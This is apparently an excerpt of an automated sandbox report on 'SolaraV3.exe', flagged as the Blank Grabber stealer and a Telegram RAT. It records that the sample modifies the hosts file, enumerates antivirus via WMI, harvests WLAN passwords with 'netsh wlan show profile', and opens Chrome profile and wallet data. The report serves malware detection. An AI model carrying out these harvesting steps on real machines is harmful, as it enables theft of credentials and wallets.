Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC70D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00007FF6DC70D010

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC725E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

1_2_00007FF6DC725E7C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEB48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

110_2_00007FF74EEB48CC

Source: C:\Users\user\Desktop\SolaraV3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EthereumZ
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystoreZ

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
